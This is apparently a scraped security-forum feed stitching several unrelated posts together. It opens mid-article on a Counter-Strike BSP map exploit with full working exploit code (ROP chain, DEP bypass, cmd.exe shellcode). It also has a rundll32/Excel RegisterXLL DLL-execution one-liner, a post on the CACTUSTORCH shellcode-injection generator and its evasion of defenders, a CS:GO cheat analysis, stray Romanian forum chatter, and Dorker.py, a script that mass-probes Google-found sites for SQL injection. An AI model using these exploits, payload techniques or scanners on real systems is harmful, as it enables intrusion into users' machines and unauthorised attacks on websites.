my gadgets. What a pain! Hours of debugging and testing with WinDBG later, I had successfully confirmed that this ROP chain was working! All I needed was to change my exploit script to add in some shellcode and I was golden. I found some Windows Universal cmd.exe shellcode from Shell Storm and BOOM! Command prompt appeared. Check out a video of it in action Here is the complete exploit code that I wrote to get control over the BSP file and get code running: #!/usr/bin/env python # Counter Strike: Condition Zero BSP map exploit # By @Digital_Cold Jun 11, 2017 from binascii import hexlify, unhexlify from struct import pack, unpack import math import mmap import logging fmt = "[+] %(message)s" logging.basicConfig(level=logging.INFO, format=fmt) l = logging.getLogger("exploit") # Specific to the file INDEX_BUFFER_OFF = 0x92ee0 # ARRAY[int] VERTEX_BUFFER_INDEXES_OFF = 0xA9174 # ARRAY[unsigned short] VERTEX_DATA_OFF = 0x37f7c # ARRAY[VEC3], VEC3[float, float, float] NUM_EDGES_OFF = 0x70f94 # The length that was fuzzed to cause the crash # No longer used as could not find a gadget to 'pop, pop, pop esp, ret' # SEH_OVERWRITE_OFF = 0x4126C # Initial offset into the index buffer where the function to exploit resides INITIAL_OFFSET = 0xb130 # this is multiplied by 4 for data type size already # INDEX_BUFFER # 0: 20 # 1: 10 # 2: 2 --> Vertex Buffer Indexes # VERTEX BUFFER INDEXES # 0: 1 # 1: 2 # 2: 4 --> Vertex Data # VERTEX DATA # 0: 1.23, 23423.0, 3453.3 # 1: 1.23, -9.0, 3453.3 # 2: 1.0, 1.0, 1.0 # 3: 1.0, 1.0, 1.0 # 4: 0.0, 1.0, 0.0 # Example: # a = INDEX_BUFFER[2] ; a = 2 # b = VERTEX_BUFFER[a] ; b = 4 # vec = VERTEX_DATA[b] ; vec = 0.0, 1.0, 0.0 def dw(x): return pack("I", x) def main(): target_file = "eip-minimized.bsp" output_file = "exploit-gen.bsp" print "GoldSource .BSP file corruptor" print " by @Digital_Cold" print l.info("Corrupting target file %s" % target_file) # Read in and memory map target file fp = open(target_file, 'rb') mmfile = mmap.mmap(fp.fileno(), 0, access = mmap.ACCESS_READ | mmap.ACCESS_COPY) fp.close() VEC3_COUNT = 63 # then come Saved EBP and return address start_idx = INDEX_BUFFER_OFF + INITIAL_OFFSET second_idx = VERTEX_BUFFER_INDEXES_OFF vertex_data_start = VERTEX_DATA_OFF + 12*0x1000 # arbitrary offset, lower causes faults l.info("Writing to index buffer offset %08x...", start_idx) l.info("Vertex buffer indexes start %08x", second_idx) l.info("Vertex data at %08x", vertex_data_start) data_buffer = [] for i in range(VEC3_COUNT): for j in range(3): data_buffer.append(str(chr(0x41+i)*4)) # easy to see pattern in memory data_buffer.append("\x00\x00\x00\x00") # dont care data_buffer.append("\x00\x00\x00\x00") # unk1 data_buffer.append("\x00\x00\x00\x00") # unk2 data_buffer.append("\x00\x00\x00\x00") # numVerts (needs to be zero to skip tail call) data_buffer.append("\x00\x00\x00\x00") # EBP data_buffer.append(dw(0x01407316)) # Saved Ret --> POP EBP; RET [hl.exe] # XXX: bug in mona. This is a ptr to VirtualProtectEx!! # 0x387e01ec, # ptr to &VirtualProtect() [IAT steamclient.dll] """ Register setup for VirtualAlloc() : -------------------------------------------- EAX = NOP (0x90909090) ECX = flProtect (0x40) EDX = flAllocationType (0x1000) EBX = dwSize ESP = lpAddress (automatic) EBP = ReturnTo (ptr to jmp esp) ESI = ptr to VirtualAlloc() EDI = ROP NOP (RETN) --- alternative chain --- EAX = ptr to &VirtualAlloc() ECX = flProtect (0x40) EDX = flAllocationType (0x1000) EBX = dwSize ESP = lpAddress (automatic) EBP = POP (skip 4 bytes) ESI = ptr to JMP [EAX] EDI = ROP NOP (RETN) + place ptr to "jmp esp" on stack, below PUSHAD -------------------------------------------- """ # START ROP CHAIN # DEP disable ROP chain # rop chain generated with mona.py - www.corelan.be # # useful for finding INT3 gadget - !mona find -s ccc3 -type bin -m hl,steamclient,filesystem_stdio rop_gadgets = [ #0x3808A308, # INT3 # RETN [steamclient.dll] 0x38420ade, # POP EDX # RETN [steamclient.dll] 0x387e01e8, # ptr to &VirtualAlloc() [IAT steamclient.dll] 0x381236c5, # MOV ESI,DWORD PTR DS:[EDX] # ADD DH,DH # RETN [steamclient.dll] 0x381ebdc1, # POP EBP # RETN [steamclient.dll] 0x381f98cd, # & jmp esp [steamclient.dll] 0x387885ac, # POP EBX # RETN [steamclient.dll] 0x00000001, # 0x00000001-> ebx 0x384251c9, # POP EDX # RETN [steamclient.dll] 0x00001000, # 0x00001000-> edx 0x387cd449, # POP ECX # RETN [steamclient.dll] 0x00000040, # 0x00000040-> ecx 0x386c57fe, # POP EDI # RETN [steamclient.dll] 0x385ca688, # RETN (ROP NOP) [steamclient.dll] 0x0140b00e, # POP EAX # RETN [hl.exe] 0x90909090, # nop 0x385c0d3e, # PUSHAD # RETN [steamclient.dll] ] # Can be replaced with ANY shellcode desired... # http://shell-storm.org/shellcode/files/shellcode-662.php shellcode = "\xFC\x33\xD2\xB2\x30\x64\xFF\x32\x5A\x8B" + \ "\x52\x0C\x8B\x52\x14\x8B\x72\x28\x33\xC9" + \ "\xB1\x18\x33\xFF\x33\xC0\xAC\x3C\x61\x7C" + \ "\x02\x2C\x20\xC1\xCF\x0D\x03\xF8\xE2\xF0" + \ "\x81\xFF\x5B\xBC\x4A\x6A\x8B\x5A\x10\x8B" + \ "\x12\x75\xDA\x8B\x53\x3C\x03\xD3\xFF\x72" + \ "\x34\x8B\x52\x78\x03\xD3\x8B\x72\x20\x03" + \ "\xF3\x33\xC9\x41\xAD\x03\xC3\x81\x38\x47" + \ "\x65\x74\x50\x75\xF4\x81\x78\x04\x72\x6F" + \ "\x63\x41\x75\xEB\x81\x78\x08\x64\x64\x72" + \ "\x65\x75\xE2\x49\x8B\x72\x24\x03\xF3\x66" + \ "\x8B\x0C\x4E\x8B\x72\x1C\x03\xF3\x8B\x14" + \ "\x8E\x03\xD3\x52\x68\x78\x65\x63\x01\xFE" + \ "\x4C\x24\x03\x68\x57\x69\x6E\x45\x54\x53" + \ "\xFF\xD2\x68\x63\x6D\x64\x01\xFE\x4C\x24" + \ "\x03\x6A\x05\x33\xC9\x8D\x4C\x24\x04\x51" + \ "\xFF\xD0\x68\x65\x73\x73\x01\x8B\xDF\xFE" + \ "\x4C\x24\x03\x68\x50\x72\x6F\x63\x68\x45" + \ "\x78\x69\x74\x54\xFF\x74\x24\x20\xFF\x54" + \ "\x24\x20\x57\xFF\xD0" shellcode += "\xeb\xfe" # infinite loop! (we dont want hl.exe to crash) shellcode += "\xeb\xfe" shellcode += "\xeb\xfe" shellcode += "\xeb\xfe" shellcode += "\xeb\xfe" shellcode_dwords = int(math.ceil(len(shellcode)/4.0)) extra_dwords = int(math.ceil((len(rop_gadgets)+shellcode_dwords)/3.0)) # Loop count (needs to be the exact amount of ROP we want to write data_buffer.append(dw(extra_dwords)) for addr in rop_gadgets: data_buffer.append(dw(addr)) for b in range(shellcode_dwords): data = "" for byte in range(4): idx = byte + b*4 # pad to nearest DWORD with INT3 if idx >= len(shellcode): data += "\xcc" else: data += shellcode[idx] data_buffer.append(data) second_idx += 8000*4 # time 4 because we skip every-other WORD, which means each index has 4 bytes # 8000 is arbitrary, but it doesn't cause the map load to exit with a FATAL before # we can exploit the function # UNCOMMENT TO CHANGE INITIAL SIZE OF OVERFLOW #mmfile[NUM_EDGES_OFF] = pack("B", 0x41) for i in range(int(math.ceil(len(data_buffer)/3.0))): mmfile[start_idx+4*i:start_idx+4*(i+1)] = pack("I", 8000+i) mmfile[second_idx+2*i:second_idx+2*(i+1)] = pack("H", 0x1000+i) second_idx += 2 # required because the game loads every-other word # This data will now be on the stack for j in range(3): sub_idx = j*4 + i*0xc data_idx = i*3 + j towrite = "" if data_idx >= len(data_buffer): towrite = "\x00"*4 else: towrite = data_buffer[i*3 + j] mmfile[vertex_data_start+sub_idx:vertex_data_start+sub_idx+4] = towrite #l.debug("Write[%08x] --> offset %d" % (unpack("I", towrite)[0], vertex_data_start+sub_idx)) # write out the corrupted file outfile = open(output_file, "wb") outfile.write(mmfile) outfile.close() l.info("Wrote %d byte exploit file to %s" % (len(mmfile), output_file)) l.info("Copy to game maps/ directory!") if __name__ == "__main__": main() As you can see, the exploit code is quite hardcoded to the map file. The shellcode and ROP chain are stored in the LUMP_VERTICES section and the LUMP_EDGES and LUMP_SURFEDGES are hijacked to get the function to read from an exact spot in the vertices lump. With more understanding of the BSP format combined with a parser, this exploit code would not have to guess offsets and it could just edit exact positions. Here’s the output when running the exploit { cscz-bsp } > ./exploit.py GoldSource .BSP file corruptor by @Digital_Cold [+] Corrupting target file eip-minimized.bsp [+] Writing to index buffer offset 0009e010... [+] Vertex buffer indexes start 000a9174 [+] Vertex data at 00043f7c [+] Wrote 2478632 byte exploit file to exploit-gen.bsp [+] Copy to game maps/ directory! Given that this vulnerability is now patched, it’s unlikely that this exploit will be of any use. Here is the exploit packagethat I sent Valve in my report. The shellcode and ROP chain are different, but the concept is the same. Remote Exploitation While developing this exploit I explored the idea of hosting it on a server. The only issue I ran into was getting the server itself to not crash when loading the map file. I came up with a possible method of hosting a malicious map file on a server. Due to the map crashing the server, what about not letting the server load the map? Instead have it load the legitimate map and then have the client download the map via HTTP as configured by the sv_downloadurl in your server.cfg. This variable was created to alleviate the slow download speeds when downloading directly from the Half-Life Dedicated Server (HLDS). Maps and other resources can be hosted directly under any HTTP server, such as nginx or apache, which will improve resource download speed. All we need the client to do is to start loading the map. At this point the vulnerability will be triggered and it won’t matter that the maps don’t match. Unfortunately map files are checksumed by the client and server (via CRC_MapFile). During the initial server connection, the client will compare its map checksum to the servers. If they don’t match, it will exit. I believe the approach to bypass this would be to modify the server binary to bypass or load a constant CRC value. I didn’t get this far, but I looked into it. Half-Life Security Improvements While developing the BSP exploit, I noted some key changes to the Half-Life GoldSrc Windows build process that would hamper future vulnerability impact and exploit development ease: Ensure that ASLR is enabled for hl.exe, steamclient.dll, and filesystem_stdio.dll Impact: This will limit the number of fixed address ROP gadgets available to attackers without a corresponding ASLR break via memory leak. Fix: Add /DYNAMICBASE to linker flags. Enable SafeSEH for all loaded modules, (hl.exe and filesystem_stdio.dll are missing it) Fix: Add /SAFESEH to linker flags. Impact: This will limit the use of Structured Exception Handler (SEH) exploits (which for this bug was possible due to unlimited stack overflow, leading to the corruption of on-stack exception handler function pointers). Enable stack cookies Impact: Enabling stack cookies protects large, on-stack buffers, which is most likely common in the GoldSrc engine. Future buffer overflows would become more difficult to exploit with this mitigation enabled. For the function with the buffer overflow, the usage of stack cookies (or canaries) would have prevented the straightforward saved return address hijack. Fix: Add /GS (guard stack) to compiler flags. Hopefully Valve takes my build environment modifications into consideration as it’s the cheapest and most effective way to improve the overall security posture of GoldSrc and other engines. On Shared Code Vulnerabilities After some digging, I found the source code for the vulnerable function, GL_SubdivideSurface. This function is a part of the original Quake engine and has been inherited by every derivative engine since its open source release! Who knows how many engines out there use this function internally. Thoughts and Future Work Finding bugs in Counter Strike was quite the process. Detailing out in writing makes me appreciate how many little details went into the whole process. This endeavor was primarily a learning experience for me and my first disclosure of a vulnerability. I certainly look forward to finding more interesting bugs and creating even more sophisticated exploits in the future. Follow me on twitter @Digital_Cold to keep up-to-date with any other interesting bugs or targets I run across or comment down below if you have any questions. Special thanks to TobalJackson for proofreading this article. Sursa: https://hernan.de/blog/2017/07/07/lock-and-load-exploiting-counter-strike-via-bsp-map-files/

Execute DLL via the Excel.Application object's RegisterXLL() method BAT REM rundll32 mshtml.dll HTA one-liner command: rundll32.exe javascript:"\..\mshtml.dll,RunHTMLApplication ";x=new%20ActiveXObject('Excel.Application');x.RegisterXLL('C:\\Windows\\Temp\\evilDLL.log');this.close(); JS // Create Instace of Excel.Application COM object var excel = new ActiveXObject("Excel.Application"); // Pass in path to the DLL (can use any extension) excel.RegisterXLL("C:\\Users\\Bob\\AppData\\Local\\Temp\\evilDLL.xyz"); Powershell # Create Instace of Excel.Application COM object $excel = [activator]::CreateInstance([type]::GetTypeFromProgID("Excel.Application")) # Pass in path to the DLL (can use any extension) $excel.RegisterXLL("C:\Users\Bob\Downloads\evilDLL.txt") Sursa: https://gist.github.com/ryhanson/227229866af52e2d963cf941af135a52

Payload Generation with CACTUSTORCH 10/07/2017 | Author: Admin CACTUSTORCH is a framework for payload generation that can be used in adversary simulation engagements based on James Forshaw’s DotNetToJScript tool. This tool allows C# binaries to be bootstrapped inside a payload, providing reliable means to bypass many common defences. Currently CACTUSTORCH supports the following payload types: VBS VBA JS JSE WSF HTA VBE Prior to this, it was not possible to invoke shellcode injection directly from multiple formats with the exclusion of VBA macros (more on this later in the post). CACTUSTORCH has a self-contained C# binary which accepts a binary name and base64 encoded shellcode to inject. Additionally, it borrows concepts from @armitagehacker / CobaltStrike’s VBA macro injection whereby it selects the 32 bit executable to inject into. State of Current Payloads Generation of payloads for the supported formats already exists in several frameworks, including Metasploit and Cobalt Strike. There are however some drawbacks to how these payloads are generated. In Metasploit framework the following payload formats work as such: VBS: File drop and execute – Touches disk. HTA-PSH: Runs powershell.exe with a WScript.Shell object – Powershell.exe and WScript.Shell are well known to blue team. VBA-EXE: File drop and execute – Touches disk. VBA: Shellcode injection by declaring Kernel32 API – Known indicators for Maldoc scanning. VBA-PSH: Runs powershell.exe with a Shell object – Powershell.exe is well known to blue team. In CobaltStrike, the following payload formats work as such: VBS: Weakens the target, creates a COM object to Excel, creates worksheet, injects VBA macro code and executes. – Relies on Office being installed and Kernel32 API declarations in injected VBA. VBA: Shellcode injection by declaring Kernel32 API – Known indicators for Maldoc scanning. HTA-EXE: File drop and execute – Touches disk. HTA-PSH: Runs powershell.exe with a WScript.Shell object – Powershell.exe and WScript.Shell are well known to blue team. HTA-VBA: Wraps around a VBS that does the weakening, COM object to Excel, macro injection of Kernel32 API declaration VBA code. Benefits of CACTUSTORCH CACTUSTORCH offers a number of improvements on current payload generation that are currently beyond the capabilities of the public frameworks: Does not use Kernel32 API declarations in the payload Obfuscated within the C# binary Allows for arbitrary specification of target binary to spawn. Allows for arbitrary shellcode to be specified. Does not spawn PowerShell.exe. Does not require Powershell. Does not require Office. Does not invoke WScript.Shell. Does not require staging as the full stageless shellcode can be contained within the delivered payload. No static parent to child spawn, the user can change what wscript.exe spawns. exe spawning Powershell.exe is suspicious, spawning rundll32.exe is arguably less indicative of compromise. You can change this to calc.exe, ping.exe /t or similar less suspicious binaries. Using CACTUSTORCH Using CACTUSTORCH is relatively straight forward, the following outlines the steps required to generate a custom payload: Select the payload format you want to use from the cloned directory Select a binary container you want to inject into, has to exist in both SYSWOW64 and SYSTEM32 Generate raw shellcode for your listener $> cat payload.bin | base64 -w 0 > out.txt Copy the out.txt base64 raw payload into the “code” variable of the template If doing it for the VBA, run the out.txt through vbasplit.py out.txt split.txt Then copy the split.txt into the code section highlighted in the VBA template Payload is ready Do obfuscation if you want A video demonstrating these steps is shown below: Integration with Cobalt Strike As part of the process for streamlining adversary simulation engagements so that more time can be placed into creating more sophisticated and bespoke attacks, Vincent has created a CACTUSTORCH aggressor script to facilitate this. After loading the aggressor script, the following menu is presented as an option under the “Attack” tab. You can now select the payloads you want to use and options, it will generate the payload and host it for you. In terms of the VBA code, it will be presented in a textbox where it can be copied from and pasted into a Word VBA Macro. The aggressor script is demonstrated in the following video: Credits The scripts, proof of concepts and aggressor script addon is created by Vincent Yiu of the ActiveBreach team. We would like to also thank the following people for their contributions: @tiraniddo: James Forshaw for DotNet2Jscript @cn33liz: Inspiration with StarFighters @armitagehacker: Raphael Mudge for idea of selecting 32 bit version on 64 bit architecture machines for injection into @_RastaMouse: Testing and giving recommendations around README CACTUSTORCH can be downloaded from the MDSec ActiveBreach github page. Sursa: https://www.mdsec.co.uk/2017/07/payload-generation-with-cactustorch/

Reverse engineering a CS:GO cheating software TL;DR: Technical low-level analysis of the cheat, also including the licensing and differences between public and private version. CS:GO is one of the most popular competitive online games, it has 520.285 current players as I write these lines. As in any other competition-driven game, cheaters arise, and specially in the CS community, they have become a serious problem. Today we are taking a look at the public and private version of a cheat for this game! I won't mention the name of the cheat to avoid giving them free advertisement and because it's not necessary for this post, but if you're into this topic, you'll probably guess. Before we start, it's important to mention that I managed to get a private version build using an alternative channel 😈. This means I've never paid to the developer, so I didn't support their business in any way! Damn you, cheaters! Public vs Private version This cheat is quite accessible, as the developer provides a public (free) version with all the capabilities for the users to try. The most important "downside", is that the public cheat is obviously detected by VAC, so if you use it in a VAC-protected server, it's a matter of time that your account gets VAC-banned. Here is where the paid private version comes into play: Customers get a unique build that is guaranteed to be undetected. Licensing Each private version build of the cheat is tied to a machine, to avoid piracy, reselling, ... The license procedure gets the SystemDrive environment variable, and using DeviceIoControl with the parameter IOCTL_DISK_GET_DRIVE_GEOMETRY, reads the technical capabilities of the hard drive. Then the Processor Brand String is also read using the cpuid instruction. This information is formatted into a string, hashed with SHA1, and mutated with a custom ASCII rotation algorithm: for ( i = 0; i < v16; v16 = strlen((const char *)&sha1_hex) ) { v18 = *((char *)&sha1_hex + i); if ( (unsigned int)(v18 - '0') > 9 ) *((_BYTE *)&sha1_hex + i) = v18 + 5; else *((_BYTE *)&sha1_hex + i) = v18 + '!'; ++i; } The resulting string is your unique license, which is sent to the cheat developer when you buy it, and in return you get a build that only works in the computer that generated this license. How the cheat works This cheat is an external cheat, which means all the work is done out of the CS:GO process (no DLL injection). The first thing it does is open the csgo.exe process, and get the base addresses of client.dll and engine.dll. Then it uses patterns to find game structures (offsets) in the memory, these patterns usually match opcodes of the game binaries, where memory pointers are referenced, or other useful information. They also use patterns to find game functions and strings. For example, one of the patterns is: 89 0D ? ? ? ? 8B 0D ? ? ? ? 8B F2 8B C1 83 CE 08 If we look for these bytes in the client.dll file, we get the following hit: 0x102bdf1d 890de815f214 mov dword [0x14f215e8], ecx 0x102bdf23 8b0d5ccaec12 mov ecx, dword [0x12ecca5c] 0x102bdf29 8bf2 mov esi, edx 0x102bdf2b 8bc1 mov eax, ecx 0x102bdf2d 83ce08 or esi, 8 Which means this pattern is looking for one of those global memory references present in the first two disassembly lines. As we said, they also use patterns to locate game functions, for instance with the following pattern, the cheat locates the start of the function used by the game to execute console commands in-game: 55 8B EC 8B ? ? ? ? ? 81 F9 ? ? ? ? 75 0C A1 ? ? ? ? 35 ? ? ? ? EB 05 8B 01 FF 50 34 50 A1 This one is found in engine.dll: 0x100aa300 55 push ebp 0x100aa301 8bec mov ebp, esp 0x100aa303 8b0d54345b10 mov ecx, dword [0x105b3454] 0x100aa309 81f938345b10 cmp ecx, 0x105b3438 ,=< 0x100aa30f 750c jne 0x100aa31d | 0x100aa311 a168345b10 mov eax, dword [0x105b3468] | 0x100aa316 3538345b10 xor eax, 0x105b3438 ,==< 0x100aa31b eb05 jmp 0x100aa322 |`-> 0x100aa31d 8b01 mov eax, dword [ecx] | 0x100aa31f ff5034 call dword [eax + 0x34] `--> 0x100aa322 50 push eax 0x100aa323 a1f8325a10 mov eax, dword [0x105a32f8] [...] If the cheat wants to run an in-game console command, it can allocate memory in the game process, pass the arguments to the function using this memory, and create a new thread using CreateRemoteThread at the beginning of the procedure. When the cheat has located all it needs to work, it will start a bunch of threads that implement each of the functionalities. These threads are in charge of monitoring and manipulate the game memory using the functions ReadProcessMemory and WriteProcessMemory. Changing the values of the internal game structures at will, the cheat can achieve the functionalities it offers. I have identified some of the functions and renamed them in my pseudocode: CreateThread(0, 0, (LPTHREAD_START_ROUTINE)aimassist, 0, 0, 0); CreateThread(0, 0, (LPTHREAD_START_ROUTINE)aimlock, 0, 0, 0); CreateThread(0, 0, (LPTHREAD_START_ROUTINE)bunnyhop, 0, 0, 0); CreateThread(0, 0, (LPTHREAD_START_ROUTINE)anti_flash, 0, 0, 0); CreateThread(0, 0, (LPTHREAD_START_ROUTINE)sub_403F0E, 0, 0, 0); CreateThread(0, 0, (LPTHREAD_START_ROUTINE)esp_hack, 0, 0, 0); CreateThread(0, 0, (LPTHREAD_START_ROUTINE)radar_hack, 0, 0, 0); CreateThread(0, 0, (LPTHREAD_START_ROUTINE)kill_message, 0, 0, 0); while ( !byte_4F1081 || !byte_4F1054 || !byte_4F1082 || !byte_4F10C9 || !byte_4F1062 || !byte_4F1040 || !byte_4F1090 || !byte_4F1028 ) Sleep(0x64u); // Default config cfg_antiflash = 1; cfg_aimlock = 1; cfg_killmessage = 1; cfg_radarhack = 1; byte_4F1032 = 0; cfg_glowesp = 1; byte_4F10C0 = 0; cfg_bunnyhop = 1; cfg_aimassist = 1; cfg_reload(); while ( WaitForSingleObject(csgo_prochandler, 0) != 0 ) cfg_changes_loop(); CloseHandle(csgo_prochandler); j_exit(0); Private version protection The public version is poorly protected, they just encrypted the strings with a simple algorithm but it has no code obfuscation or PE packing. On the other side, the private version is protected with Themida, a commercial packer that, depending on its configuration, can be quite effective protecting executables. It's very likely that they use Themida for two purposes: Protect the cheat license from being patched. The program can be manipulated to validate any license when running in a computer, but reconstruct a fully working version of the packed executable and patch it may be quite tricky. The second and most important, avoid the VAC signatures from detecting their cheat when running. Themida can protect the original opcodes of the program when it's loaded in memory and running, and writing signatures (patterns) for those opcodes is one of the methods VAC uses to detect cheaters. Closing If we compare it to other cheats, this one is simple in terms of functionality, but still quite effective. Bear in mind that the CSGO binaries used for the analysis are not from the latest game update, as I wrote this one week ago. The binaries I used are: 942fa5d3ef9e0328157b34666327461cee10aae74b26af135b8589dc35a5abc7 client.dll e6f3eda5877f2584aeb43122a85d0861946c7fb4222d0cb6f3bc30034e4d3e24 engine.dll 1a5bb2b0ae9f2e6ef757c834eeb2c360a59dce274b2e4137706031f629e6455f csgo.exe This means that the cheat signatures may have been slightly modified to work with the new executables, and the offsets probably won't be the same if these binaries changed in the latest version of the game. Sursa: https://blog.badtrace.com/post/reverse-engineering-a-csgo-cheat/

1. Scapa de alte servicii care consuma resurse. 2. Foloseste doar nginx + php-fpm. 3. Foloseste php opcache cu o perioada cat mai mare de revalidare. 4. Fa un upgrade la mariadb 10.1. Si optimizeaza ce ai pe acolo. 5. Optimizeaza-ti imaginile de pe server precum si cache-ul de la resursele statice. Vezi si setarile de la cloudflare referitor la acestea. 6. Browserele noi suporta http2 si asta ar putea sa imi mareasca performanta (testeaza). 7. Daca cms-ul tau support cache atunci activeaza-l. Incearca sa folosesti memcached/redis pentru cache. De obicei filecache nu are performanta asa de mare.

Mi-a mai venit o idee. Cand cineva termina cu succes un challenge in loc de mesajul de felicitare sau "succes" nu ar fi mai bine sa primeasca 5, 10 sau 20 de euro ?

#!/usr/bin/python## Dorker.py ## SQL Dork finder script that crawls google for sites vulnerable to SQL Injection ## Author: Xinapse ## Website: http://www.iexploit.org ## Email: iexploittube@gmail.com ## Twitter: #iExploitXinapse ## Version 0.0.1 ## Usage dorker.py [options] from xgoogle.search import GoogleSearch, SearchError import time, urllib2, optparse print ''' ________ __ \______ \ ___________| | __ ____ _______ | | \ / _ \_ __ \ |/ /_/ __ \\_ __ \ | ` ( <_> ) | \/ < \ ___/ | | \/ /_______ /\____/|__| |__|_ \ \___ >|__| \/ \/ \/ --------------------------------------------------------------------------------- -- dorker.py -- -- SQL Dork finder script -- -- Author: Xinapse -- -- Website: http://www.iexploit.org -- -- Email: iexploittube@gmail.com -- -- Twitter: #iExploitXinapse -- -- Version 0.0.1 -- -- Usage dorker.py [options] -- --------------------------------------------------------------------------------- ''' parser = optparse.OptionParser() options = optparse.OptionGroup(parser, 'Options') parser.add_option('-d', '--dork', action='store', type='string', help='Dork to Scan', metavar='DORK') parser.add_option('-f', '--file', action='store', type='string', help='Filename to save', metavar='FILE') parser.add_option('-v', '--verbose', action="store_true", dest="verbose", default=False, help="Adds extra status messages showing program execution") parser.add_option('-e', '--evasion', action='store', type='string', help='How long to sleep between each google request, used to prevent google blocking your IP for too many requests, recommended at least 5+, default 10', metavar='EVASION') (opts, args) = parser.parse_args() urlno = 0 invuln = 0 if opts.dork: dork = opts.dork else: print '>> Please enter a dork' if opts.file: filename = opts.file else: print '>> Please enter a filename' if opts.verbose: verbose = 'true' else: verbose = 'false' if opts.evasion: evas = opts.evasion else: evas = 10 pagecount = 0 counter = 0 try: pagecount = pagecount + 1 if verbose == 'true': print '>> Crawling google page ' + str(pagecount) + '...' search = GoogleSearch(dork) while True: search.results_per_page=100 tmp = search.get_results() if not tmp: break if verbose == 'true': print '>> No more results...' for t in tmp: try: url = t.url.encode("utf8") if verbose == 'true': print '>> Testing ' + url + ' for vulnerabilities...' testurl = url + "'" req = urllib2.urlopen(testurl) data = req.read() if "sql" in data or "SQL" in data or "MySQL" in data or "MYSQL" in data or "MSSQL" in data: f = open (filename, "a") if verbose == 'true': print ">> Found possible injection in " + url f.write(testurl + "\n") f.close() counter = counter + 1 else: invuln = invuln + 1 except: errors = 1 if verbose == 'true': print '>> Sleeping to bypass google flood protection...' time.sleep(evas) except SearchError, e: print ">> Search failed: %s" % e print '>> Dorker scan ended' print '>> ' + str(counter) + ' vulnerable sites found' print '>> ' + str(invuln) + ' sites not vulnerable' print '>> Thank you for using Dorker, output has been saved to ' + filename Download xgoogle library: https://github.com/pkrumins/xgoogle Dorker.py A SQL Injection Dork Scanner